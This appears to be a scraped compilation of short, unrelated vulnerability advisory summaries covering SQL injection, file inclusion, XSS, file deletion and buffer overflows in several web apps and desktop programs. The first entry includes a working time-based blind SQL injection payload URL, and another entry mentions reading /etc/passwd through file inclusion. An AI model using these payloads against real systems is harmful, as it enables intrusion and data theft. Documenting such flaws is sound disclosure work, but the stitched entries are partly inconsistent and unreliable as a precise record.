When an authenticated user is navigating to 'Settings/Translations' and is clicking on the button 'Update Filter' the following GET-request is sent to the server: http://127.0.0.1/private/en/locale/index?form=filter&form_token=408d28a8cbab7890c11b20af033c486b&application=&module=&type%5B%5D=act&type%5B%5D=err&type%5B%5D=lbl&type%5B%5D=msg&language%5B%5D=en&name=&value= The parameter language[] is prone to boolean-based blind and stacked queries SQL-Injection. WIth the following payload a delay can be provoked in the request of additional 10 seconds: http://127.0.0.1/private/en/locale/index?form=filter&form_token=68aa8d273e0bd95a70e67372841603d5&application=&module=&type%5B%5D=act%27%2b(select%20*%20from%20(select(sleep(10)))a)%2b%27&type%5B%5D=err&type%5B%5D=lbl&type%5B%5D=msg&language%5B%5D=en&name=&value= Also the parameters type[] are prone to SQL-Injection.
Database::escape_string() function is used to sanitize data but it will work only in two situations: 'function_output' or 'function_output'. There is few places where this function is used without quotation marks. For this exploit you need teacher privilege (api_is_allowed_to_edit(false, true)) and at least one forum category must exist (get_forum_categories()). For second exploit you need administrator privilege (there is no CSRF protection).
StaMPi is vulnerable to Local File Inclusion (LFI) attacks. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to the victim. The malicious URL contains a malicious file path which is then included in the application. This can lead to the disclosure of sensitive information such as the /etc/passwd file.
u5CMS is a little, handy Content Management System for medium-sized websites, conference / congress / submission administration, review processes, personalized serial mails, PayPal payments and online surveys based on PHP and MySQL and Apache. u5CMS suffers from multiple stored and reflected cross-site scripting vulnerabilities. Input passed to several POST and GET parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
u5CMS suffers from an authenticated file inclusion vulnerability (LFI) when input passed thru the 'f' parameter to thumb.php script is not properly verified before being used to include files. This can be exploited to include files from local resources with their absolute path and with directory traversal attacks.
Input passed via multiple parameters in multiple scripts is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Input passed to the 'f' parameter in 'deletefile.php' is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server using their absolute path or via directory traversal sequences passed within the affected GET parameter.
A Memory Corruption Vulnerability is detected on Chemtool 1.6.14. An attacker can crash the software by using an input file. Also, an attacker can crash the software by entering a filename too long.
A SQL Injection vulnerability exists in Redaxscript CMS 2.2.0. The vulnerable parameter is the 'search_terms' parameter in the 'search_post()' function of the 'redaxscript/includes/search.php' file. An attacker can send a maliciously crafted POST request to the vulnerable application to execute arbitrary SQL commands in the back-end database.
MooPlayer 1.3.0 is vulnerable to a SEH buffer overflow vulnerability. The vulnerability is triggered when a specially crafted m3u file is opened in the application. The SEH chain is overwritten with the value of nSEH and SEH, and the stack is filled with the value of AAAA. The registers are also overwritten with the value of CCCC and nSEH.
Services By CQR